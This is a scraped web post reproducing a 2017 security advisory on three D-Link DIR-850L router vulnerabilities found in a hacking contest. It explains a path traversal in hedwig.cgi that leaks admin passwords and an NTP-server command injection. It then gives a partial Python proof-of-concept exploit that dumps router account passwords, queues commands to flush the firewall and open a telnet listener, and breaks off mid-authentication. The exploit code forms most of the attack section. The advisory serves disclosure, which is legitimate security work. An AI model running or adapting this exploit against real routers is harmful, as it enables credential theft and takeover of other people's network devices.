{"id":8641,"date":"2017-08-08T14:19:21","date_gmt":"2017-08-08T22:19:21","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/08\/08\/news-2414\/"},"modified":"2017-08-08T14:19:21","modified_gmt":"2017-08-08T22:19:21","slug":"news-2414","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/08\/08\/news-2414\/","title":{"rendered":"SSD Advisory \u2013 D-Link 850L Multiple Vulnerabilities (Hack2Win Contest)"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 08 Aug 2017 08:49:00 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3364\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3364');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describe three (3) vulnerabilities found in D-Link 850L router. <\/p>\n<p>The vulnerabilities have been reported as part of Hack2Win competition, for more information about Hack2Win &#8211; Hack2Win &#8211; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3310\" target=\"_blank\">https:\/\/blogs.securiteam.com\/index.php\/archives\/3310<\/a>.<\/p>\n<p>The vulnerabilities found in D-Link 850L are:<\/p>\n<ul>\n<li>Remote Command Execution via WAN and LAN<\/li>\n<li>Remote Unauthenticated Information Disclosure via WAN and LAN<\/li>\n<li>Unauthorized Remote Code Execution as root via LAN<\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> The vulnerabilities were found by the following researchers, while participating in Beyond Security\u2019s Hack2Win competition:<\/p>\n<ul>\n<li>Remote Command Execution via WAN and LAN: Zdenda<\/li>\n<li>Remote Unauthenticated Information Disclosure via WAN and LAN: Peter Geissler<\/li>\n<li>Unauthorized Remote Code Execution as root via LAN: Pierre Kim<\/li>\n<\/ul>\n<p><strong>Vendor response<\/strong><br \/> The vendor has released patches to address this vulnerabilities (Firmware: 1.14B07 BETA).<br \/> For more details: <a href=\"http:\/\/support.dlink.com\/ProductInfo.aspx?m=DIR-850L\" target=\"_blank\">http:\/\/support.dlink.com\/ProductInfo.aspx?m=DIR-850L<\/a><\/p>\n<p><span id=\"more-3364\"><\/span><\/p>\n<p><u><strong>Vulnerabilities details<\/strong><\/u><\/p>\n<p><strong>Remote Command Execution via WAN and LAN<\/strong><br \/> The remote Command execution is a combination of 2 different vulnerabilities:<\/p>\n<ul>\n<li>Unauthenticated Upload arbitrary files<\/li>\n<li>Execute arbitrary Commands by authenticated user with administrator privileges<\/li>\n<\/ul>\n<p>The chain of vulnerabilities will allow you, in the end, to execute Commands.<\/p>\n<p>When changing settings in admin interface, the settings are send in XML format to <em>hedwig.cgi<\/em> which loads and validates the changes. <\/p>\n<p>The <em>hedwig.cgi<\/em> calls <em>fatlady.php<\/em> for settings validation:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598a38e8ac940594783654\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [ \/htdocs\/webinc\/fatlady.php ]        16\tforeach ($prefix.&#8221;\/postxml\/module&#8221;)      17\t{     &#8230;      20\t\t$service = query(&#8220;service&#8221;);     &#8230;      23\t\t$target = &#8220;\/htdocs\/phplib\/fatlady\/&#8221;.$service.&#8221;.php&#8221;;     &#8230;      26\t\tif (isfile($target)==1) dophp(&#8220;load&#8221;, $target);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0014 seconds] -->  <\/p>\n<p>Then <em>pigwidgeon.cgi<\/em> is requested to apply the new settings (if valid) and restart the affected services. <\/p>\n<p><em>fatlady.php<\/em> loads service scripts to validate the input. However the service name comes directly from received XML and can be used to load any file with &#8220;<em>.php<\/em>&#8221; extension.<\/p>\n<p>For example we can use it to list user accounts with their passwords and get access to admin interface.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598a38e8ac950394518752\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \/htdocs\/webinc\/getcfg\/DEVICE.ACCOUNT.xml.php<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac950394518752-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac950394518752-1\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">webinc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">getcfg<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">DEVICE<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ACCOUNT<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>After we got the Admin password, we can log in and trigger the second vulnerability &#8211; NTP server shell commands injection.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598a38e8ac956962672763\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [ \/etc\/services\/DEVICE.TIME.php ]       163\t$enable = query(&#8220;\/device\/time\/ntp\/enable&#8221;);     164\tif($enable==&#8221;&#8221;) $enable = 0;     165\t$enablev6 = query(&#8220;\/device\/time\/ntp6\/enable&#8221;);     166\tif($enablev6==&#8221;&#8221;) $enablev6 = 0;     167\t$server = query(&#8220;\/device\/time\/ntp\/server&#8221;);     &#8230;     172\tif ($enable==1 &amp;&amp; $enablev6==1)     &#8230;     184\t\t\t\t&#8216;SERVER4=&#8217;.$server.&#8217;n&#8217;.     &#8230;     189\t\t\t\t&#8216;\tntpclient -h $SERVER4 -i 5 -s -4 &gt; \/dev\/consolen&#8217;.<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac956962672763-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac956962672763-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac956962672763-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac956962672763-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac956962672763-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac956962672763-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac956962672763-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac956962672763-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac956962672763-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac956962672763-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac956962672763-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac956962672763-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac956962672763-13\">13<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac956962672763-1\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">services<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">DEVICE<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">TIME<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">php<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac956962672763-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac956962672763-3\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">163<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">enable<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">query<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/device\/time\/ntp\/enable&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac956962672763-4\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">164<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">enable<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">enable<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac956962672763-5\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">165<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">enablev6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">query<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/device\/time\/ntp6\/enable&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac956962672763-6\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">166<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">enablev6<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">enablev6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac956962672763-7\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">167<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">query<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/device\/time\/ntp\/server&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac956962672763-8\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac956962672763-9\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">172<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">enable<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">enablev6<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac956962672763-10\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac956962672763-11\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">184<\/span><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-s\">&#8216;SERVER4=&#8217;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-s\">&#8216;n&#8217;<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac956962672763-12\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac956962672763-13\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">189<\/span><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-s\">&#8216;\tntpclient -h $SERVER4 -i 5 -s -4 &gt; \/dev\/consolen&#8217;<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0017 seconds] -->  <\/p>\n<p>As we can see, we can inject commands to NTP server with no validation. For example:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598a38e8ac95b188547930\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> server:  \tsomeserver; whatever&#8230;  result:  \tSERVER4=someserver  \twhatever&#8230;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95b188547930-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95b188547930-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95b188547930-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95b188547930-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95b188547930-5\">5<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95b188547930-1\"><span class=\"crayon-v\">server<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95b188547930-2\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">someserver<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">whatever<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95b188547930-3\"><span class=\"crayon-v\">result<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95b188547930-4\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">SERVER4<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">someserver<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95b188547930-5\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-v\">whatever<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598a38e8ac95e008713212\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/env python3  # pylint: disable=C0103  #  # pip3 install requests lxml  #  import hmac  import json  import sys  from urllib.parse import urljoin  from xml.sax.saxutils import escape  import lxml.etree  import requests    try:      requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)  except:      pass    TARGET = sys.argv[1]  COMMAND = &#8220;;&#8221;.join([      &#8220;iptables -F&#8221;,      &#8220;iptables -X&#8221;,      &#8220;iptables -t nat -F&#8221;,      &#8220;iptables -t nat -X&#8221;,      &#8220;iptables -t mangle -F&#8221;,      &#8220;iptables -t mangle -X&#8221;,      &#8220;iptables -P INPUT ACCEPT&#8221;,      &#8220;iptables -P FORWARD ACCEPT&#8221;,      &#8220;iptables -P OUTPUT ACCEPT&#8221;,      &#8220;telnetd -p 23090 -l \/bin\/date&#8221;  # port &#8216;Z2&#8217;      ])    session = requests.Session()  session.verify = False    ############################################################    print(&#8220;Get password&#8230;&#8221;)    headers = {&#8220;Content-Type&#8221;: &#8220;text\/xml&#8221;}  cookies = {&#8220;uid&#8221;: &#8220;whatever&#8221;}  data = &#8220;&#8221;&#8221;&lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;utf-8&#8243;?&gt;  &lt;postxml&gt;  &lt;module&gt;      &lt;service&gt;..\/..\/..\/htdocs\/webinc\/getcfg\/DEVICE.ACCOUNT.xml&lt;\/service&gt;  &lt;\/module&gt;  &lt;\/postxml&gt;&#8221;&#8221;&#8221;    resp = session.post(urljoin(TARGET, &#8220;\/hedwig.cgi&#8221;), headers=headers, cookies=cookies, data=data)  # print(resp.text)    # getcfg: &lt;module&gt;&#8230;&lt;\/module&gt;  # hedwig: &lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;utf-8&#8243;?&gt;  #       : &lt;hedwig&gt;&#8230;&lt;\/hedwig&gt;  accdata = resp.text[:resp.text.find(&#8220;&lt;?xml&#8221;)]    admin_pasw = &#8220;&#8221;    tree = lxml.etree.fromstring(accdata)  accounts = tree.xpath(&#8220;\/module\/device\/account\/entry&#8221;)  for acc in accounts:      name = acc.findtext(&#8220;name&#8221;, &#8220;&#8221;)      pasw = acc.findtext(&#8220;password&#8221;, &#8220;&#8221;)      print(&#8220;name:&#8221;, name)      print(&#8220;pass:&#8221;, pasw)      if name == &#8220;Admin&#8221;:          admin_pasw = pasw    if not admin_pasw:      print(&#8220;Admin password not found!&#8221;)      sys.exit()    ############################################################    print(&#8220;Auth challenge&#8230;&#8221;)  resp = session.get(urljoin(TARGET, &#8220;\/authentication.cgi&#8221;))  # print(resp.text)    resp = json.loads(resp.text)  if resp[&#8220;status&#8221;].lower() != &#8220;ok&#8221;:      print(&#8220;Failed!&#8221;)      